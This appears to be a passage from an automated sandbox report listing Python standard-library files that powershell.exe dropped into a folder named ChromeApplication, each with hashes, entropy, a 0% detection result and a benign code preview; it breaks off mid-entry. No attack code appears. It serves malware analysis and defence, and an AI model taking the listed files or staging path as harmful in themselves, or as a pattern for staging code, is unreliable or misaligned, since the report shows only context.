                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101137
                                                                                                                                                                                                  Entropy (8bit):4.306533315342896
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:g3gKb2hiBVRLsxQ4vu6ilEy14udYC91vhjJFGD8:gQKb2hiBVabu6ilEy14udx1vJJFGA
                                                                                                                                                                                                  MD5:5CDD2DD02315B6DD0F093C4D785E3D96
                                                                                                                                                                                                  SHA1:06057E30C7F3E7804070A90739C3577FFB9B5AD6
                                                                                                                                                                                                  SHA-256:D30F7E5CA4A44F7BA9F1626E984B7099B42FEB603B9BA8E31635D9C889793EC1
                                                                                                                                                                                                  SHA-512:10D6E90BC739158597CF8AEA1616D8B02C2B72AD8EFADE9B3668A952179CC2A9AB5B92EDECB174821556F52EA0A9081575C90D2016DBFF6175D1F3E0A0F2284D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ast.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61609
                                                                                                                                                                                                  Entropy (8bit):4.417126699054812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:pZuW0/yNX9e8T1Y+XqfdAyr8+gliw1RaDh1:pZnMyNX9/qeyI+glN1s1
                                                                                                                                                                                                  MD5:38ECD2B58AF252AC5A2D14A5AC17333B
                                                                                                                                                                                                  SHA1:F5EC2EE9D098AF6432017029E2B14B0230581ADF
                                                                                                                                                                                                  SHA-256:A1D8E96B987376D7E0CE57587830EBAA7E06509EA528D666B409D5604D1EAA8D
                                                                                                                                                                                                  SHA-512:BACE88F6DA88662BBC5A49E6617478553C2FE287CE1D46CCA77483F63FBE82849EBA45824CEE7AA57FF4F820F1024E331AF51FE46E353535D9D68160DA424848
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\asynchat.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11835
                                                                                                                                                                                                  Entropy (8bit):4.533400669114703
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:jrq3jJ1vi4b1/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRthARG9comK7KzAEyeWdm4
                                                                                                                                                                                                  MD5:A089EF65FD800EEB88D57F8752C14409
                                                                                                                                                                                                  SHA1:31ADE2E4DEDE4D6B60CCA9A484858A5552A0E533
                                                                                                                                                                                                  SHA-256:8F64AACF08D17F0D9EE51BBB540A5D2662ACB0F7C68009E895AC39D8973039A4
                                                                                                                                                                                                  SHA-512:8D3DC6975E0DA00046C867E77D5C33D3197A7D4A5E5CECD43DC31B35C4D32B300BB3201A82AF4919A6A084A3540AD61DEC521DE7F405742BF6C323AA5047F6B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\asyncore.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20917
                                                                                                                                                                                                  Entropy (8bit):4.558999571418994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:zrq3jJ1mtqOelBAVAWAm8HA2F13/29sq98ousJ9/k/u6QkAl+o/T1E06xkScEu9n:vq3jJwtq9lAAFAWzi1BSBk5
                                                                                                                                                                                                  MD5:392F12822B5A0A36504480D5B7DFC034
                                                                                                                                                                                                  SHA1:9180B8AA149971D3F96C7343F01307E3092A8A59
                                                                                                                                                                                                  SHA-256:8045DAC420E2A61BBA0474613F93282912A521AADDC027589158459DA2092469
                                                                                                                                                                                                  SHA-512:29F03D5411E003EC617CCB1B925A5C578B4BCD77FD34B6DE16EA592047975EED8FEDECD1C7E86082D3817B0A522436E93DB846025C72B33BBA9472D79EDD0E67
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# -*- Mode: Python -*-..# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR..# CONSEQUENT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\base64.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21450
                                                                                                                                                                                                  Entropy (8bit):4.817384784161953
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:j+uTwvnidNdYaBM+3m8dvd936r34MJIz5V1d:9EANdlBM+3m8dvd936kfz57d
                                                                                                                                                                                                  MD5:430BEF083EDC3857987FA9FDFAD40A1B
                                                                                                                                                                                                  SHA1:53BD3144F2A93454D747A765AC63F14056428A19
                                                                                                                                                                                                  SHA-256:2BDCB6D9EDFD97C91BC8AB325FCC3226C71527AA444ADB0A4ED70B60C18C388D
                                                                                                                                                                                                  SHA-512:7C1B8EA49BA078D051F6F21F99D8E51DC25F790E3DAFF63F733124FC7CF89417A75A8F4565029B1F2EB17F545250E1087F04ECB064022907D2D59F6430912B3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""....# Modified 04-Oct-1995 by Jack Jansen to use binascii module..# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support..# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere....import re..import struct..import binascii......__all__ = [.. # Legacy interface exports traditional RFC 2045 Base64 encodings.. 'encode', 'decode', 'encodebytes', 'decodebytes',.. # Generalized interface for other encodings.. 'b64encode', 'b64decode', 'b32encode', 'b32decode',.. 'b32hexencode', 'b32hexdecode', 'b16encode', 'b16decode',.. # Base85 and Ascii85 encodings.. 'b85encode', 'b85decode', 'a85encode', 'a85decode',.. # Standard Base64 encoding.. 'standard_b64encode', 'standard_b64decode',.. # Some common Base64 alternatives. As referenced by RFC 3458, see thread.. # starting at:.. #.. # http://zgp.org/pipermail/p2p-hackers/2001-September/00

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\bdb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33287
                                                                                                                                                                                                  Entropy (8bit):4.376029848133808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jv2yeGid9OJ5zweRTWR8mQL+7bN3Lczaa7iXBW8wVdsF/isFuJQMFIqZ4F9bFxS:jvYVd9OH7s81+7xczaaeXkgwBqqZoS
                                                                                                                                                                                                  MD5:6C933F78BA56372D681B34FEEC71EEE5
                                                                                                                                                                                                  SHA1:BDC267A6CD41185C864E3594D6DBB5928F23910F
                                                                                                                                                                                                  SHA-256:B2FE296B24FAF056B199ECEFB3752088479C218429B9422D30E2E5C0CEF163A6
                                                                                                                                                                                                  SHA-512:028F20AF9575626691847B9882CAA9BAF7CD24C3E764CE66505173D2F904A422744247488540D895B797D51D7278C02C38310199E0C46F964B03061717762F7C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Debugger basics"""....import fnmatch..import sys..import os..from inspect import CO_GENERATOR, CO_COROUTINE, CO_ASYNC_GENERATOR....__all__ = ["BdbQuit", "Bdb", "Breakpoint"]....GENERATOR_AND_COROUTINE_FLAGS = CO_GENERATOR | CO_COROUTINE | CO_ASYNC_GENERATOR......class BdbQuit(Exception):.. """Exception to give up completely."""......class Bdb:.. """Generic Python debugger base class..... This class takes care of details of the trace facility;.. a derived class should implement user interaction... The standard debugger class (pdb.Pdb) is an example..... The optional skip argument must be an iterable of glob-style.. module name patterns. The debugger will not step into frames.. that originate in a module that matches one of these patterns... Whether a frame is considered to originate in a certain module.. is determined by the __name__ in the frame globals... """.... def __init__(self, skip=None):.. self.skip = set(skip) if skip else None..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\binhex.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15286
                                                                                                                                                                                                  Entropy (8bit):4.473768652352682
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ckFvMjtNaabEsUKEbyh8E3HggxlfCdchpgjTmMTJ+XI7hut:rvMjeCfgchpATmMTAXUhut
                                                                                                                                                                                                  MD5:5FC5580386DF83003AD1993BAC736976
                                                                                                                                                                                                  SHA1:3713A4E0B8CCD4BA68C90B0A2C9EB7FD45B6E901
                                                                                                                                                                                                  SHA-256:E2BE54DE2B60C5AE1097FDD617CFFA57543F0C27CBFCD35BED98056A8896112A
                                                                                                                                                                                                  SHA-512:E03BB610FAD318CEA0BD6325C3FC09E773C7A520B30D4B3FD9267479A25D92E7F55E007856B11C34857497296898AC3A8B1C0406AA07C456EFAF90AFB4E1F2F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Macintosh binhex compression/decompression.....easy interface:..binhex(inputfilename, outputfilename)..hexbin(inputfilename, outputfilename).."""....#..# Jack Jansen, CWI, August 1995...#..# The module is supposed to be as compatible as possible. Especially the..# easy interface should work "as expected" on any platform...# XXXX Note: currently, textfiles appear in mac-form on all platforms...# We seem to lack a simple character-translate in python...# (we should probably use ISO-Latin-1 on all but the mac platform)...# XXXX The simple routines are too simple: they expect to hold the complete..# files in-core. Should be fixed...# XXXX It would be nice to handle AppleDouble format on unix..# (for servers serving macs)...# XXXX I don't understand what happens when you get 0x90 times the same byte on..# input. The resulting code (xx 90 90) would appear to be interpreted as an..# escaped *value* of 0x90. All coders I've seen appear to ignore this nicety.....#..import binascii..import co

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\bisect.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3245
                                                                                                                                                                                                  Entropy (8bit):4.315031092069688
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:zPKqBnBS/P2bld2S/xu47KHBntS/cEmXNYldcS/Dsuz:rnBBSn2bySJu47MBtSEEmXNYwSbtz
                                                                                                                                                                                                  MD5:83E7F736E1877AF35CF077675DE88849
                                                                                                                                                                                                  SHA1:F4EC527F0164CA35653C546D20D78680E359AADA
                                                                                                                                                                                                  SHA-256:05D6B239EE3D6114A682AA9A5EFB8F8B315CCE6FC2A5D6F1147192AB5A044F44
                                                                                                                                                                                                  SHA-512:A511F888A7BE2D58846F9DF8694699638797151EA992A954F982761102BA8C6DB5794F4CCFA3C8F36C997FF349C2EC3482E0353A71D4564958C12BFD2093DDAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Bisection algorithms."""......def insort_right(a, x, lo=0, hi=None, *, key=None):.. """Insert item x in list a, and keep it sorted assuming a is sorted..... If x is already in a, insert it to the right of the rightmost x..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched... """.. if key is None:.. lo = bisect_right(a, x, lo, hi).. else:.. lo = bisect_right(a, key(x), lo, hi, key=key).. a.insert(lo, x)......def bisect_right(a, x, lo=0, hi=None, *, key=None):.. """Return the index where to insert item x in list a, assuming a is sorted..... The return value i is such that all e in a[:i] have e <= x, and all e in.. a[i:] have e > x. So if x already appears in the list, a.insert(i, x) will.. insert just after the rightmost x already there..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched... """.... if lo < 0:.. raise ValueError('

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\bz2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12191
                                                                                                                                                                                                  Entropy (8bit):4.488567907611872
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wzhNfE8LZDY+YEzU3/OF/q+FjqqxbWXVvScmwWa0r1LAd1ichQiilHfP6Qhc9O1O:KLrXX/q+FjZWq2Wan3oxc8NE0Bx4
                                                                                                                                                                                                  MD5:C7F6B929829D1196DFC6C59BFA8BE4D5
                                                                                                                                                                                                  SHA1:2B0A3AF1F680F8D70E05A25AA8552A47E5109F7D
                                                                                                                                                                                                  SHA-256:A539FC503737C53D5A45272E33A435B8A6B7A8559BA6A425002978038096BD66
                                                                                                                                                                                                  SHA-512:63BFA9AD43141C609436B928F7DEBB5477188F1E7B30EBD6D9CC5080DB6D10FBF4E94C25BEC3E2C7DC8677D7BCD537B93550324A08B5376FD9E35184A8517E3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Interface to the libbzip2 compression library.....This module provides a file interface, classes for incremental..(de)compression, and functions for one-shot (de)compression..."""....__all__ = ["BZ2File", "BZ2Compressor", "BZ2Decompressor",.. "open", "compress", "decompress"]....__author__ = "Nadeem Vawda <nadeem.vawda@gmail.com>"....from builtins import open as _builtin_open..import io..import os..import _compression....from _bz2 import BZ2Compressor, BZ2Decompressor......_MODE_CLOSED = 0.._MODE_READ = 1..# Value 2 no longer used.._MODE_WRITE = 3......class BZ2File(_compression.BaseStream):.... """A file object providing transparent bzip2 (de)compression..... A BZ2File can act as a wrapper for an existing file object, or refer.. directly to a named file on disk..... Note that BZ2File provides a *binary* file interface - data read is.. returned as bytes, and data to be written should be given as bytes... """.... def __init__(self, filename, mo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\cProfile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6525
                                                                                                                                                                                                  Entropy (8bit):4.383466107396597
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:GJRbR7raBofIUXCM/nRwcIxjZzxjl7ThaGDDj0:G/1CeIKZMZzxh7Nu
                                                                                                                                                                                                  MD5:E033728A638E731841FB31E026BF27F6
                                                                                                                                                                                                  SHA1:718766B787EE3EBD4627BB1EDEEEAFE328F9DF82
                                                                                                                                                                                                  SHA-256:8ED9EDFE153C6A3CCB3F0AAF1EBE57EE506DBDCF9ADC98063A9412B40AD78602
                                                                                                                                                                                                  SHA-512:34C9B6B2DA68028CB0242BB757604A6FF7FD2CD67534BFBC5D73282FD8043A92350E1D9E255BE064531D8F01E339F26EE983D1256293DEA48190AD76A6D0F20F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Python interface for the 'lsprof' profiler... Compatible with the 'profile' module..."""....__all__ = ["run", "runctx", "Profile"]....import _lsprof..import profile as _pyprofile....# ____________________________________________________________..# Simple interface....def run(statement, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).run(statement, filename, sort)....def runctx(statement, globals, locals, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).runctx(statement, globals, locals,.. filename, sort)....run.__doc__ = _pyprofile.run.__doc__..runctx.__doc__ = _pyprofile.runctx.__doc__....# ____________________________________________________________....class Profile(_lsprof.Profiler):.. """Profile(timer=None, timeunit=None, subcalls=True, builtins=True).... Builds a profiler object using the specified timer function... The default timer is a fast built-in one based on r

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\calendar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25334
                                                                                                                                                                                                  Entropy (8bit):4.630646062928224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:TyXrfTnK3ZC77ZRVBfdPRSEFsW8ehzEOPs7OKkmw3:TyXbTnK3Wfvf7SE+W8euOPs7g1
                                                                                                                                                                                                  MD5:BDF280E9D5F52895524695699119B833
                                                                                                                                                                                                  SHA1:B4AF7451AC4FD85D86C9262B44CA3C1072461B11
                                                                                                                                                                                                  SHA-256:36E622CAC77F97C83E44EEF3FF39B02DAF63B831E057679E1387F45B48C9BFBF
                                                                                                                                                                                                  SHA-512:FF884EB6927AB18BABD1B843FE6AAADC83A4F92E2606BC3B077D19729529C44C9C434A48323B2BAE20F255CE3609C89552FF335F03F1E21277F0E624AD1C0141
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Calendar printing functions....Note when comparing these calendars to the ones printed by cal(1): By..default, these calendars have Monday as the first day of the week, and..Sunday as the last (the European convention). Use setfirstweekday() to..set the first day of the week (0=Monday, 6=Sunday)."""....import sys..import datetime..import locale as _locale..from itertools import repeat....__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",.. "firstweekday", "isleap", "leapdays", "weekday", "monthrange",.. "monthcalendar", "prmonth", "month", "prcal", "calendar",.. "timegm", "month_name", "month_abbr", "day_name", "day_abbr",.. "Calendar", "TextCalendar", "HTMLCalendar", "LocaleTextCalendar",.. "LocaleHTMLCalendar", "weekheader",.. "MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY", "FRIDAY",.. "SATURDAY", "SUNDAY"]....# Exception raised for bad input (with string parameter for details)..error = Valu

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\cgi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35103
                                                                                                                                                                                                  Entropy (8bit):4.561073317486329
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:HJv4jDz46jcJeYMs0s1mZrgmTJFg9kAQNM0KJkY:HB4A6jcV0swZrgIJFg9kAQNM0KJkY
                                                                                                                                                                                                  MD5:8F647F8C3398EF82CCDF1BFF189E5396
                                                                                                                                                                                                  SHA1:9B561E19C640AB1B6177FF15D3DB65AFAF5355CA
                                                                                                                                                                                                  SHA-256:38088BEE5D627AD53A309DC1E66997DA87FEB238A5473A24E8568589226CDD31
                                                                                                                                                                                                  SHA-512:C12A3E0F1A099E4600295013CDF1071AE455C25CFB69147336C1251B96FF104EDA88EF429C364D13950B0E1C950B00C664ED14BE84F03BB6CC8654B254E21C83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:#! /usr/local/bin/python....# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is..# intentionally NOT "/usr/bin/env python". On many systems..# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI..# scripts, and /usr/local/bin is the default directory where Python is..# installed, so /usr/bin/env would be unable to find python. Granted,..# binary installations by Linux vendors often install Python in..# /usr/bin. So let those vendors patch cgi.py to match their choice..# of installation....."""Support module for CGI (Common Gateway Interface) scripts.....This module defines a number of utilities for use by CGI scripts..written in Python..."""....# History..# -------..#..# Michael McLay started this module. Steve Majewski changed the..# interface to SvFormContentDict and FormContentDict. The multipart..# parsing was inspired by code submitted by Andreas Paepcke. Guido van..# Rossum rewrote, reformatted and documented the module and is currently..# respons

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\cgitb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12417
                                                                                                                                                                                                  Entropy (8bit):4.597855983527975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Cs8wrqrtx1PM/iy/UOt+JeyDUMkJo/tXR:V8t14/N+JvxkJEVR
                                                                                                                                                                                                  MD5:96E289FA4C662E66654E57C8B7BCFCBA
                                                                                                                                                                                                  SHA1:941AD05DEEF8F2FA0D6FA425BB01D7EAD90DDCDA
                                                                                                                                                                                                  SHA-256:F0BC49E9C3410E447635E639E7C925298C063438E8243755084450963740BD8B
                                                                                                                                                                                                  SHA-512:2B5C269319F535017C5B0BB94E6C12F3C51FC6DCC9D9F2E960818D87E07FDB3D50B3E42FE1EB3364BF71ED8FF1FA730813104BAA2D3B50DDA23121654AF487F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""More comprehensive traceback formatting for Python scripts.....To enable this module, do:.... import cgitb; cgitb.enable()....at the top of your script. The optional arguments to enable() are:.... display - if true, tracebacks are displayed in the web browser.. logdir - if set, tracebacks are written to files in this directory.. context - number of lines of source code to show for each stack frame.. format - 'text' or 'html' controls the output format....By default, tracebacks are displayed but not saved, the context is 5 lines..and the output format is 'html' (for backwards compatibility with the..original use of this module)....Alternatively, if you have caught an exception and want cgitb to display it..for you, call cgitb.handler(). The optional argument to handler() is a..3-item tuple (etype, evalue, etb) just like the value of sys.exc_info()...The default handler displays output as HTML....."""..import inspect..import keyword..import linecache

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\chunk.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5604
                                                                                                                                                                                                  Entropy (8bit):4.3736641383152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Or09dhcWG/Fu2EC6Gyk6h8zsGx/SAojX6wu/YBsrgS:OV40whqs06Dul1v
                                                                                                                                                                                                  MD5:9593CA4791DDE9A600B40AFE78A0A1D1
                                                                                                                                                                                                  SHA1:D17F6A3716407202553A1BED556096B965A47525
                                                                                                                                                                                                  SHA-256:F71F8B77021C6224A772C5F8C56041D5D114E78E099E315754E502257ADDE3EC
                                                                                                                                                                                                  SHA-512:EEB3A00A6773F19F1403E502DDC15177383B77D752213BE49ECE4EC1FEAE1CB80DBE0F958AA077DBCC7665A60FB522B57B807E079F73A0E6CC11202FEB1C3BF8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Simple class to read IFF chunks.....An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File..Format)) has the following structure:....+----------------+..| ID (4 bytes) |..+----------------+..| size (4 bytes) |..+----------------+..| data |..| ... |..+----------------+....The ID is a 4-byte string which identifies the type of chunk.....The size field (a 32-bit value, encoded using big-endian byte order)..gives the size of the whole chunk, including the 8-byte header.....Usually an IFF-type file consists of one or more chunks. The proposed..usage of the Chunk class defined here is to instantiate an instance at..the start of each chunk and read from the instance until it reaches..the end, after which a new instance can be instantiated. At the end..of the file, creating a new instance will fail with an EOFError..exception.....Usage:..while True:.. try:.. chunk = Chunk(file).. except EOFError:.. break.. chunktype = chunk.get

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\cmd.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15261
                                                                                                                                                                                                  Entropy (8bit):4.215201021902796
                                                                                                                                                                                                  Encrypted:false
